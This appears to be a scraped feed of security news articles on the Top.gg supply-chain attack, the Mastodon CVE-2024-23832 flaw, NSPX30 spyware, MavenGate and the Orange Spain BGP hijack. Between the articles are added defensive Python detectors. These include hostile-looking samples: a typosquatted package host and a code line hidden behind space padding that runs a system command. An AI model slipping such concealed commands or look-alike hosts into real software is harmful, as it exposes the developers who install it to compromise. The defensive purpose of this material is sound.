Hackers Hijack GitHub Accounts in Supply Chain Attack Affecting Top-gg and Others
https://www.indiavpn.org/2024/03/25/hackers-hijack-github-accounts-in-supply-chain-attack-affecting-top-gg-and-others/
Mon, 25 Mar 2024 13:41:57 +0000

Mar 25, 2024 | Newsroom | Supply Chain Attack / Cryptocurrency

Unidentified adversaries orchestrated a sophisticated attack campaign that has impacted several individual developers as well as the GitHub organization account associated with Top.gg, a Discord bot discovery site.

“The threat actors used multiple TTPs in this attack, including account takeover via stolen browser cookies, contributing malicious code with verified commits, setting up a custom Python mirror, and publishing malicious packages to the PyPI registry,” Checkmarx said in a technical report shared with The Hacker News.

The software supply chain attack is said to have led to the theft of sensitive information, including passwords, credentials, and other valuable data. Some aspects of the campaign were previously disclosed at the start of the month by an Egypt-based developer named Mohammed Dief.

It chiefly entailed registering a typosquat of PyPI's package-file host, "files.pythonhosted[.]org", under the look-alike name "files.pypihosted[.]org" and using it to host trojanized versions of well-known packages like colorama. Cloudflare has since taken down the domain.

“The threat actors took Colorama (a highly popular tool with 150+ million monthly downloads), copied it, and inserted malicious code,” Checkmarx researchers said. “They then concealed the harmful payload within Colorama using space padding and hosted this modified version on their typosquatted-domain fake-mirror.”


These rogue packages were then propagated via GitHub repositories such as github[.]com/maleduque/Valorant-Checker and github[.]com/Fronse/League-of-Legends-Checker that contained a requirements.txt file, which serves as the list of Python packages to be installed by the pip package manager.

One repository that continues to remain active as of writing is github[.]com/whiteblackgang12/Discord-Token-Generator, which includes a reference to the malicious version of colorama hosted on “files.pypihosted[.]org.”
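The requirements.txt mechanism described above can be checked mechanically. The script below is an added example, not code from the Checkmarx report or from any of the repositories named: it scans a requirements.txt for index overrides and direct package URLs whose host is not PyPI's own (pypi.org, files.pythonhosted.org), flags hosts that are look-alikes of those names, and flags requirements that carry no --hash pin; a second function catches the space-padding trick by looking for long whitespace runs between two pieces of code on one line. The sample requirements.txt and the sample source line are constructed for the example.

```python
import re
from difflib import SequenceMatcher
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Hosts the stock pip resolver talks to. Any other host named in a
# requirements.txt as an index or a direct package URL deserves a look.
OFFICIAL_HOSTS = ("pypi.org", "files.pythonhosted.org")

# pip options that redirect resolution to another index or file source.
INDEX_OPTIONS = ("--index-url", "--extra-index-url", "--find-links", "-i", "-f")

Finding = Tuple[int, str, str]  # (line number, reason, original line)


def _host_findings(host: Optional[str], line_no: int, raw: str) -> List[Finding]:
    """Classify a host as official, a look-alike of an official host, or foreign."""
    if not host or host in OFFICIAL_HOSTS:
        return []
    for official in OFFICIAL_HOSTS:
        # files.pypihosted.org vs files.pythonhosted.org scores about 0.86 here
        if SequenceMatcher(None, host, official).ratio() >= 0.8:
            return [(line_no, f"look-alike host {host!r} resembles {official!r}", raw)]
    return [(line_no, f"non-official host {host!r}", raw)]


def scan_requirements(text: str) -> List[Finding]:
    """Flag lines that pull code from outside PyPI or pin a package without
    a --hash, so pip would accept whatever the index hands back.
    Backslash continuations are joined first, so line numbers count logical lines."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.replace("\\\n", " ").splitlines(), start=1):
        line = raw.split(" #", 1)[0].strip()
        if not line or line.startswith("#"):
            continue
        for opt in INDEX_OPTIONS:
            if line.startswith(opt):
                rest = line[len(opt):].lstrip("= ").split()
                host = urlparse(rest[0]).hostname if rest else None
                findings.extend(_host_findings(host, line_no, raw))
                break
        else:
            url = re.search(r"https?://[^\s;]+", line)
            if url:
                findings.extend(_host_findings(urlparse(url.group(0)).hostname, line_no, raw))
            elif "--hash=" not in line:
                findings.append((line_no, "no --hash pin; pip cannot verify the artifact", raw))
    return findings


def find_padded_lines(source: str, min_gap: int = 80) -> List[Tuple[int, str]]:
    """Flag source lines where a long run of spaces pushes code past the
    visible editor width, the concealment trick used in the trojanized
    colorama. Returns (line number, first 40 characters of the line)."""
    gap = re.compile(r"\S {%d,}\S" % min_gap)
    return [(n, line.rstrip()[:40]) for n, line in enumerate(source.splitlines(), 1) if gap.search(line)]


# Constructed sample requirements.txt modelled on the pattern described above.
SAMPLE_REQUIREMENTS = """\
colorama==0.4.6
colorama @ https://files.pypihosted.org/packages/colorama-0.4.6.tar.gz
--extra-index-url https://files.pypihosted.org/simple
numpy==1.26.4 --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
"""

# Constructed source file: a second statement hidden behind 120 spaces.
SAMPLE_SOURCE = "import os\nprint('ok')" + " " * 120 + "__import__('os').system('id')\n"

if __name__ == "__main__":
    for line_no, reason, _ in scan_requirements(SAMPLE_REQUIREMENTS):
        print(f"requirements.txt:{line_no}: {reason}")
    for line_no, head in find_padded_lines(SAMPLE_SOURCE):
        print(f"padded code at line {line_no}: {head}...")
```

The hash check is the one that actually closes the hole: with `pip install --require-hashes -r requirements.txt`, a swapped artifact fails to install even if the index it came from was rewritten.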


The campaign also altered the requirements.txt file of Top.gg's python-sdk repository, via a commit by an account named editor-syntax on February 20, 2024. The repository maintainers have since addressed the issue.

It's worth noting that the "editor-syntax" account is a legitimate maintainer of the Top.gg GitHub organization with write permissions to Top.gg's repositories, indicating that the threat actor hijacked the verified account in order to push the malicious commit.

“The GitHub account of ‘editor-syntax’ was likely hijacked through stolen cookies,” Checkmarx noted.

“The attacker gained access to the account’s session cookies, allowing them to bypass authentication and perform malicious activities using the GitHub UI. This method of account takeover is particularly concerning, as it does not require the attacker to know the account’s password.”

What's more, the threat actors pushed multiple changes to the rogue repositories in a single commit, altering as many as 52 files in one instance, to bury the change to the requirements.txt file among them.


The malware embedded in the counterfeit colorama package activates a multi-stage infection sequence that leads to the execution of Python code fetched from a remote server, which, in turn, is capable of establishing persistence on the host via Windows Registry changes and stealing browser data, crypto wallets, Discord tokens, and session tokens for Instagram and Telegram.

“The malware includes a file stealer component that searches for files with specific keywords in their names or extensions,” the researchers said. “It targets directories such as Desktop, Downloads, Documents, and Recent Files.”

The captured data is ultimately transferred to the attackers via anonymous file-sharing services like GoFile and Anonfiles. Alternatively, the data is sent to the threat actor's infrastructure using HTTP requests, alongside a hardware identifier or IP address to track the victim machine.

“This campaign is a prime example of the sophisticated tactics employed by malicious actors to distribute malware through trusted platforms like PyPI and GitHub,” the researcher concluded.

“This incident highlights the importance of vigilance when installing packages and repositories even from trusted sources. It is crucial to thoroughly vet dependencies, monitor for suspicious network activity, and maintain robust security practices to mitigate the risk of falling victim to such attacks.”

Mastodon Vulnerability Allows Hackers to Hijack Any Decentralized Account
https://www.indiavpn.org/2024/02/03/mastodon-vulnerability-allows-hackers-to-hijack-any-decentralized-account/
Sat, 03 Feb 2024 07:17:58 +0000

Feb 03, 2024 | Newsroom | Vulnerability / Social Media


The decentralized social network Mastodon has disclosed a critical security flaw that enables malicious actors to impersonate and take over any account.

“Due to insufficient origin validation in all Mastodon, attackers can impersonate and take over any remote account,” the maintainers said in a terse advisory.

The vulnerability, tracked as CVE-2024-23832, has a severity rating of 9.4 out of a maximum of 10. Security researcher arcanicanis has been credited with discovering and reporting it.

It has been described as an “origin validation error” (CWE-346), which can typically allow an attacker to “access any functionality that is inadvertently accessible to the source.”

Every Mastodon version prior to 3.5.17 is vulnerable, as are 4.0.x versions before 4.0.13, 4.1.x versions before 4.1.13, and 4.2.x versions before 4.2.5.
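An added example, not from the Mastodon advisory: the version ranges above encoded so that a fleet of instances can be checked from the version string each one reports in its /api/v1/instance response. The JSON sample is constructed, and the treatment of pre-release suffixes and of branches newer than 4.2 is an assumption, noted in the code.

```python
import json
import re
from typing import Tuple

# major, minor, patch, then 1 for a final release or 0 for a pre-release,
# so that 4.2.5-rc1 sorts below 4.2.5.
Version = Tuple[int, int, int, int]

# First fixed release on each maintained branch, from the advisory above.
FIXED = {
    (3, 5): (3, 5, 17, 1),
    (4, 0): (4, 0, 13, 1),
    (4, 1): (4, 1, 13, 1),
    (4, 2): (4, 2, 5, 1),
}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.]+)?")


def parse_version(text: str) -> Version:
    """Accepts '4.2.4', 'v4.1.12', '4.2.1+glitch', '4.3.0-nightly.2024-02-01'.
    Build metadata after '+' is ignored; a '-' suffix marks a pre-release."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Mastodon version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups()[:3])
    return (major, minor, patch, 0 if m.group(4) else 1)


def is_vulnerable(text: str) -> bool:
    """True if CVE-2024-23832 applies to the given version string."""
    v = parse_version(text)
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]
    if branch < (3, 5):
        return True  # everything before 3.5.17 is affected
    # Assumption: a branch newer than any listed one (e.g. a 4.3 nightly)
    # already carries the fix.
    return False


def check_instance(body: str) -> dict:
    """Evaluate the JSON body returned by an instance's /api/v1/instance
    endpoint, whose 'version' field carries the running release."""
    data = json.loads(body)
    version = data["version"]
    return {"uri": data.get("uri"), "version": version, "vulnerable": is_vulnerable(version)}


# Constructed response, shaped like /api/v1/instance output.
SAMPLE_INSTANCE = json.dumps({"uri": "mastodon.example", "version": "4.2.4"})

if __name__ == "__main__":
    print(check_instance(SAMPLE_INSTANCE))
```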

Mastodon said it’s withholding additional technical specifics about the flaw until February 15, 2024, to give admins ample time to update the server instances and prevent the likelihood of exploitation.


“Any amount of detail would make it very easy to come up with an exploit,” it said.

The federated nature of the platform means that it runs on separate servers (aka instances), independently hosted and operated by respective administrators who create their own rules and regulations that are enforced locally.

This also means not only that each instance has its own code of conduct, terms of service, privacy policy, and content moderation guidelines, but also that each administrator must apply security updates in a timely fashion to protect the instance against such flaws.

The disclosure arrives nearly seven months after Mastodon addressed two other critical flaws (CVE-2023-36460 and CVE-2023-36459) that could have been weaponized by adversaries to cause denial-of-service (DoS) or achieve remote code execution.

China-backed Hackers Hijack Software Updates to Implant "NSPX30" Spyware
https://www.indiavpn.org/2024/01/25/china-backed-hackers-hijack-software-updates-to-implant-nspx30-spyware/
Thu, 25 Jan 2024 11:16:33 +0000


A previously undocumented China-aligned threat actor has been linked to a set of adversary-in-the-middle (AitM) attacks that hijack update requests from legitimate software to deliver a sophisticated implant named NSPX30.

Slovak cybersecurity firm ESET is tracking the advanced persistent threat (APT) group under the name Blackwood. It’s said to be active since at least 2018.

The NSPX30 implant has been observed deployed via the update mechanisms of known software such as Tencent QQ, WPS Office, and Sogou Pinyin, with the attacks targeting Chinese and Japanese manufacturing, trading, and engineering companies as well as individuals located in China, Japan, and the U.K.


“NSPX30 is a multistage implant that includes several components such as a dropper, an installer, loaders, an orchestrator, and a backdoor,” security researcher Facundo Muñoz said. “Both of the latter two have their own sets of plugins.”

“The implant was designed around the attackers’ capability to conduct packet interception, enabling NSPX30 operators to hide their infrastructure.”

The origins of the backdoor, which is also capable of bypassing several Chinese anti-malware solutions by allowlisting itself, can be traced to another malware from January 2005 codenamed Project Wood, which is designed to harvest system and network information, record keystrokes, and take screenshots from victim systems.


Project Wood’s codebase has acted as the foundation for several implants, including spawning variants like DCM (aka Dark Specter) in 2008, with the malware subsequently used in attacks targeting individuals of interest in Hong Kong and the Greater China area in 2012 and 2014.

NSPX30, the latest iteration of the implant, is delivered when a legitimate application's request for a software update, sent over unencrypted HTTP, is intercepted and answered with a malicious payload instead of the real update, paving the way for the deployment of a dropper DLL file.


The malicious dropper deployed through the compromised update process creates several files on disk and executes "RsStub.exe," a binary belonging to the Rising Antivirus software that is susceptible to DLL side-loading, so that it loads the attacker-supplied "comx3.dll."

“comx3.dll” functions as a loader to execute a third file named “comx3.dll.txt,” which is an installer library responsible for activating the next-stage attack chain that culminates in the execution of the orchestrator component (“WIN.cfg”).

It’s currently not known how the threat actors deliver the dropper in the form of malicious updates, but Chinese threat actors like BlackTech, Evasive Panda, and Mustang Panda have leveraged compromised routers as a channel to distribute malware in the past.

ESET speculates that the attackers “are deploying a network implant in the networks of the victims, possibly on vulnerable network appliances such as routers or gateways.”

“The fact that we found no indications of traffic redirection via DNS might indicate that when the hypothesized network implant intercepts unencrypted HTTP traffic related to updates, it replies with the NSPX30 implant’s dropper in the form of a DLL, an executable file, or a ZIP archive containing the DLL.”


The orchestrator then proceeds to create two threads, one to obtain the backdoor (“msfmtkl.dat”) and another to load its plugins and add exclusions to allowlist the loader DLLs to bypass Chinese anti-malware solutions.

The backdoor is downloaded via an HTTP request to Baidu’s website www.baidu[.]com, a legitimate Chinese search engine, with an unusual User-Agent string that masquerades the request as originating from the Internet Explorer browser on Windows 98.

The response from the server is then saved to a file from which the backdoor component is extracted and loaded into memory.
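Two steps in the chain above are observable from network telemetry: an updater fetching over cleartext HTTP, which is what the on-path implant needs in order to substitute the response, and the backdoor retrieval from www.baidu.com with a User-Agent claiming Internet Explorer on Windows 98. The detector below is an added example, not ESET's code; the log layout, the host names and the User-Agent string are constructed, since the report as quoted here does not give the exact string.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class HttpEvent:
    ts: str
    src: str
    host: str
    port: int
    method: str
    uri: str
    user_agent: str


# Constructed proxy-log layout: ts src host:port METHOD uri "user-agent"
_LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<host>[^:\s]+):(?P<port>\d+) '
    r'(?P<method>[A-Z]+) (?P<uri>\S+) "(?P<ua>[^"]*)"$'
)

# Browser/OS claims that no current Windows fleet should produce.
_LEGACY_UA = re.compile(r"MSIE \d|Windows 9[58]|Windows NT [45]\.\d")
# Host or path fragments typical of an updater's version check or download.
_UPDATE_HINT = re.compile(r"updat|upgrad|autoupd|patch", re.I)


def parse_line(line: str) -> HttpEvent:
    m = _LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return HttpEvent(m["ts"], m["src"], m["host"], int(m["port"]), m["method"], m["uri"], m["ua"])


def classify(ev: HttpEvent) -> List[str]:
    """Return the reasons an event matches the NSPX30 delivery or
    backdoor-retrieval pattern; an empty list means nothing matched."""
    reasons = []
    if ev.port == 80 and _UPDATE_HINT.search(ev.host + ev.uri):
        reasons.append("update check over cleartext HTTP: an on-path implant can swap the response")
    if _LEGACY_UA.search(ev.user_agent):
        what = "legacy IE/Windows 9x User-Agent"
        if ev.host.endswith("baidu.com"):
            what += " to baidu.com (matches the NSPX30 backdoor fetch)"
        reasons.append(what)
    return reasons


def detect(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Run classify() over a whole log; returns (src, host, reasons) for each hit."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.src, ev.host, reasons))
    return hits


# Constructed sample; the update host uses a reserved name and the second
# User-Agent mimics the decoy described above, not the real string.
SAMPLE_LOG = """\
2024-01-10T09:12:01Z 10.0.5.23 update.example.invalid:80 GET /check/version.xml "example-updater/1.0"
2024-01-10T09:12:07Z 10.0.5.23 www.baidu.com:80 GET / "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
2024-01-10T09:13:00Z 10.0.5.24 www.baidu.com:443 GET / "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

if __name__ == "__main__":
    for src, host, reasons in detect(SAMPLE_LOG):
        print(f"{src} -> {host}: " + "; ".join(reasons))
```

The cleartext-update rule is the durable one: it does not depend on a particular decoy host or User-Agent and it also surfaces the software whose update channel should be moved to HTTPS with certificate checks, which removes the AitM opportunity entirely.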


NSPX30, as part of its initialization phase, also creates a passive UDP listening socket for receiving commands from the controller and exfiltrating data, likely by intercepting DNS query packets, in order to anonymize its command-and-control (C2) infrastructure.

The instructions allow the backdoor to create a reverse shell, collect file information, terminate specific processes, capture screenshots, log keystrokes, and even uninstall itself from the infected machine.

The disclosure comes weeks after SecurityScorecard revealed new infrastructure connected to another Beijing-nexus cyber espionage group known as Volt Typhoon (aka Bronze Silhouette) that leverages a botnet created by exploiting known security flaws in end-of-life Cisco RV320/325 routers (CVE-2019-1652 and CVE-2019-1653) operating across Europe, North America, and Asia Pacific.

“Approximately 30% of them (325 of 1,116 devices) communicated with two IP addresses previously named as proxy routers used for command-and-control (C2) communications, 174.138.56[.]21 and 159.203.113[.]25, in a thirty-day period,” the company said.

“Volt Typhoon may aim to use these compromised devices to transfer stolen data or connect to target organizations’ networks.”

MavenGate Attack Could Let Hackers Hijack Java and Android via Abandoned Libraries
https://www.indiavpn.org/2024/01/22/mavengate-attack-could-let-hackers-hijack-java-and-android-via-abandoned-libraries/
Mon, 22 Jan 2024 21:12:24 +0000


Several public and popular libraries abandoned but still used in Java and Android applications have been found susceptible to a new software supply chain attack method called MavenGate.

“Access to projects can be hijacked through domain name purchases and since most default build configurations are vulnerable, it would be difficult or even impossible to know whether an attack was being performed,” Oversecured said in an analysis published last week.

Successful exploitation of these shortcomings could allow nefarious actors to hijack artifacts in dependencies and inject malicious code into the application, and worse, even compromise the build process through a malicious plugin.

The mobile security firm added that all Maven-based technologies, including Gradle, are vulnerable to the attack, and that it sent reports to more than 200 companies, including Google, Facebook, Signal, Amazon, and others.

Apache Maven is chiefly used for building and managing Java-based projects: it downloads and manages dependencies (identified by coordinates whose namespace is the groupId, conventionally a reversed domain name), generates documentation, and handles releases.

While repositories hosting such dependencies can be private or public, an attacker could target the latter to conduct supply chain poisoning attacks by leveraging abandoned libraries added to known repositories.

Specifically, it involves purchasing the expired domain whose reversed form is the groupId of an abandoned dependency, and using that ownership to claim the groupId.


“An attacker can gain access to a vulnerable groupId by asserting their rights to it via a DNS TXT record in a repository where no account managing the vulnerable groupId exists,” the company said.

“If a groupId is already registered with the repository, an attacker can attempt to gain access to that groupId by contacting the repository’s support team.”

To test out the attack scenario, Oversecured uploaded its own test Android library (groupId: “com.oversecured”), which displays the toast message “Hello World!,” to Maven Central (version 1.0), while also uploading two versions to JitPack, where version 1.0 is a replica of the same library published on Maven Central.

But version 1.1 is an edited “untrusted” copy that also has the same groupId, but which points to a GitHub repository under their control and is claimed by adding a DNS TXT record to reference the GitHub username in order to establish proof of ownership.

The attack then works by declaring both Maven Central and JitPack in the repositories list of the Gradle build script. It's worth noting that the order of declaration determines the order in which Gradle queries repositories when resolving dependencies.

“When we moved the JitPack repository above mavenCentral, version 1.0 was downloaded from JitPack,” the researchers said. “Changing the library version to 1.1 resulted in using the JitPack version regardless of the position of JitPack in the repository list.”

As a result, an adversary looking to corrupt the software supply chain can either target an existing version by publishing the same coordinates to a repository that is queried before the legitimate one, or target future upgrades by publishing a higher version number that exists only in the rogue repository.
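As an added example (not Oversecured's tooling), the script below performs two of the checks a team would want after reading the above: it derives the domain that backs each groupId in a dependency list and reports the ones that no longer resolve, and it lints a build.gradle repositories block for repositories that Gradle will query before mavenCentral(). The groupId com.oversecured is the researchers' own test namespace; the other coordinates, the build script and the DNS stand-in are constructed.

```python
import re
import socket
from typing import Callable, List, Optional, Tuple

# Namespaces granted by a repository on proof of a GitHub/GitLab account, not
# of a domain, so they do not lapse when a domain registration expires.
HOSTED_PREFIXES = ("io.github.", "com.github.", "io.gitlab.", "org.bitbucket.")
# Public second-level labels under which the third label is the registrable name.
SECOND_LEVEL = {"co", "com", "org", "net", "ac", "gov", "edu"}


def group_id_to_domain(group_id: str) -> Optional[str]:
    """'com.example.lib' -> 'example.com'; 'uk.co.example' -> 'example.co.uk';
    None for repository-hosted namespaces or groupIds that are not reverse domains."""
    if any(group_id.startswith(p) for p in HOSTED_PREFIXES):
        return None
    parts = group_id.lower().split(".")
    if len(parts) < 2 or not all(re.fullmatch(r"[a-z0-9-]+", p) for p in parts):
        return None
    take = 3 if parts[1] in SECOND_LEVEL and len(parts) >= 3 else 2
    return ".".join(reversed(parts[:take]))


def dns_resolves(domain: str) -> bool:
    """Default probe: does the domain still resolve? A registered domain may
    fail this (no records) and an expired one may still be parked, so confirm
    with an RDAP/WHOIS lookup before acting on a hit."""
    try:
        socket.getaddrinfo(domain, None)
        return True
    except socket.gaierror:
        return False


def audit_dependencies(coords: List[str], resolves: Callable[[str], bool] = dns_resolves) -> List[Tuple[str, str]]:
    """For each 'group:artifact:version', report the groupIds whose backing
    domain no longer resolves, i.e. candidates for a MavenGate-style takeover."""
    flagged = []
    for coord in coords:
        domain = group_id_to_domain(coord.split(":")[0])
        if domain and not resolves(domain):
            flagged.append((coord, domain))
    return flagged


_REPO_RE = re.compile(
    r"mavenCentral\(\)|google\(\)|mavenLocal\(\)|jcenter\(\)"
    r"|maven\s*\{[^}]*?url\s*=?\s*(?:uri)?\(?\s*['\"]([^'\"]+)['\"]",
    re.S,
)


def repository_order_warnings(gradle_text: str) -> List[str]:
    """Warn about repositories Gradle will query before mavenCentral().
    Gradle tries repositories in declaration order and takes the first one that
    serves the requested coordinates, so a same-version artifact in an earlier
    repository silently replaces the Maven Central one."""
    repos = [m.group(1) or m.group(0) for m in _REPO_RE.finditer(gradle_text)]
    if "mavenCentral()" not in repos:
        return ["mavenCentral() is not declared; every artifact comes from third-party repositories"]
    central = repos.index("mavenCentral()")
    return [f"{r} is queried before mavenCentral(): an artifact with the same coordinates there wins"
            for r in repos[:central]]


# Constructed inputs (com.oversecured aside).
SAMPLE_DEPENDENCIES = ["com.oversecured:test-lib:1.0", "io.github.someone:tool:2.1", "com.expired-vendor:sdk:3.4"]
SAMPLE_BUILD_GRADLE = """
repositories {
    maven { url 'https://jitpack.io' }
    mavenCentral()
    google()
}
"""


def fake_resolver(domain: str) -> bool:
    """Stand-in for DNS so the example runs offline: only one domain has lapsed."""
    return domain != "expired-vendor.com"


if __name__ == "__main__":
    for coord, domain in audit_dependencies(SAMPLE_DEPENDENCIES, fake_resolver):
        print(f"{coord}: groupId backed by unresolvable domain {domain}")
    for warning in repository_order_warnings(SAMPLE_BUILD_GRADLE):
        print("build.gradle:", warning)
```

The order lint only covers the same-version case; as the researchers' version 1.1 test shows, a higher version that exists only in the rogue repository wins regardless of order. Pair it with Gradle's dependency verification (a gradle/verification-metadata.xml carrying checksums or trusted PGP keys) or with exclusiveContent / content { includeGroup ... } filters that bind each groupId to a single repository.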

This is another form of a dependency confusion attack where an attacker publishes a rogue package to a public package repository with the same name as a package within the intended private repository.


“Most applications do not check the digital signature of dependencies, and many libraries do not even publish it,” the researchers added. “If the attacker wants to remain undetected for as long as possible, it makes sense to release a new version of the library with the malicious code embedded, and wait for the developer to upgrade to it.”

Of the 33,938 total domains analyzed, 6,170 (18.18%) of them were found to be vulnerable to MavenGate, enabling threat actors to hijack the dependencies and inject their own code.

Sonatype, which owns Maven Central, said the outlined attack strategy “is not feasible due to the automation in place,” but noted that it has “disabled all accounts associated with expired domains and GitHub projects” as a security measure.

It further said it addressed a "regression in the public key validation" process that had made it possible to upload artifacts signed with a key that was not published to a public key server. It has also announced plans to collaborate with Sigstore to digitally sign components.

“The end developer is responsible for security not only for direct dependencies, but also for transitive dependencies,” Oversecured said.

“Library developers should be responsible for the dependencies they declare and also write public key hashes for their dependencies, while the end developer should be responsible only for their direct dependencies.”

Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware
https://www.indiavpn.org/2024/01/05/orange-spain-faces-bgp-traffic-hijack-after-ripe-account-hacked-by-malware/
Fri, 05 Jan 2024 13:35:15 +0000

Jan 05, 2024 | Newsroom | Network Security / Malware


Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials, captured by infostealer malware, to hijack its Border Gateway Protocol (BGP) traffic.

“The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers,” the company said in a message posted on X (formerly Twitter).

However, the company emphasized no personal data was compromised and that the incident only affected some browsing services.


The threat actor, who goes by the name Ms_Snow_OwO on X, claimed to have gained access to Orange Spain's RIPE account. The RIPE NCC is the regional Internet registry (RIR) that allocates and registers IP addresses and autonomous system (AS) numbers in Europe, Central Asia, Russia, and West Asia.

“Using the stolen account, the threat actor modified the AS number belonging to Orange’s IP address, resulting in major disruptions to Orange and a 50% loss in traffic,” cybersecurity firm Hudson Rock said.
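The article does not say which RIPE record was changed, only that the AS number associated with Orange's address space was altered. The way a registry-side change alone makes routers drop traffic is RPKI route origin validation (RFC 6811): routers that validate announcements against published Route Origin Authorizations reject any whose origin AS does not match a covering ROA. The example below is added here and is not from the article or from Hudson Rock; it assumes the altered records were ROAs and uses documentation prefixes and AS numbers rather than Orange's.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Roa:
    """Route Origin Authorization: prefix, longest permitted length, origin AS."""
    prefix: str
    max_length: int
    origin_as: int


def validate(roas: List[Roa], prefix: str, origin_as: int) -> str:
    """RFC 6811 origin validation state for one BGP announcement:
    'not-found' if no ROA covers the prefix, 'valid' if a covering ROA names
    this origin AS and permits this prefix length, otherwise 'invalid'."""
    net = ipaddress.ip_network(prefix)
    covering = [r for r in roas
                if ipaddress.ip_network(r.prefix).version == net.version
                and net.subnet_of(ipaddress.ip_network(r.prefix))]
    if not covering:
        return "not-found"
    if any(r.origin_as == origin_as and net.prefixlen <= r.max_length for r in covering):
        return "valid"
    return "invalid"


def accepted(state: str) -> bool:
    """The common ROV policy: accept valid and not-found, drop invalid."""
    return state != "invalid"


# Constructed scenario with documentation prefixes (RFC 5737) and AS numbers (RFC 5398).
LEGIT_AS = 64496   # stands in for the operator that owns the prefixes
ROGUE_AS = 64511   # the AS number the attacker writes into the registry
ANNOUNCEMENTS: List[Tuple[str, int]] = [("192.0.2.0/24", LEGIT_AS), ("198.51.100.0/24", LEGIT_AS)]

ROAS_BEFORE = [Roa("192.0.2.0/24", 24, LEGIT_AS)]   # the second prefix has no ROA at all
ROAS_AFTER = [
    Roa("192.0.2.0/24", 24, ROGUE_AS),               # existing ROA's origin AS altered
    Roa("198.51.100.0/24", 24, ROGUE_AS),            # bogus ROA added where none existed
]


def states(roas: List[Roa]) -> Dict[str, str]:
    """Validation state of every legitimate announcement under a given ROA set."""
    return {prefix: validate(roas, prefix, asn) for prefix, asn in ANNOUNCEMENTS}


if __name__ == "__main__":
    for label, roas in (("before", ROAS_BEFORE), ("after", ROAS_AFTER)):
        for prefix, state in states(roas).items():
            verdict = "accepted" if accepted(state) else "dropped"
            print(f"{label}: {prefix} from AS{LEGIT_AS}: {state} -> {verdict}")
```

Two things are worth noticing in the output. A legitimate announcement becomes invalid as soon as the only ROA covering it names another AS, and a prefix that had no ROA (not-found, which most policies accept) becomes invalid the moment a bogus ROA is created for it. Adding a second ROA beside a correct one changes nothing, because any matching covering ROA makes the route valid; this is why write access to the registry account, rather than any BGP-level trick, is what did the damage.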


Further analysis revealed that the email address of the admin account belongs to an Orange Spain employee whose computer was infected with Raccoon Stealer malware on September 4, 2023.

It’s currently not known how the stealer found its way to the employee’s system, but such malware families are typically propagated via malvertising or phishing scams.

“Among the corporate credentials identified on the machine, the employee had specific credentials to ‘https://access.ripe.net’ using the email address which was revealed by the threat actor (adminripe-ipnt@orange.es),” the company added.

Even worse, the password used to secure Orange’s RIPE administrator account was “ripeadmin,” which is both weak and easily predictable.


Security researcher Kevin Beaumont further noted that RIPE neither mandates two-factor authentication (2FA) nor enforces a strong password policy for its accounts, making it ripe for abuse.

“Currently, infostealer marketplaces are selling thousands of credentials to access.ripe.net — effectively allowing you to repeat this at organizations and ISPs across Europe,” Beaumont said.

RIPE, which is currently investigating to see if any other accounts have been affected in a similar manner, said it will directly reach out to affected account holders. It has also urged RIPE NCC Access account users to update their passwords and enable multi-factor authentication for their accounts.

“In the long term, we’re expediting the 2FA implementation to make it mandatory for all RIPE NCC Access accounts as soon as possible and to introduce a variety of verification mechanisms,” it added.

The incident serves to highlight the consequences of infostealer infections, necessitating that organizations take steps to secure their networks from known initial attack vectors.
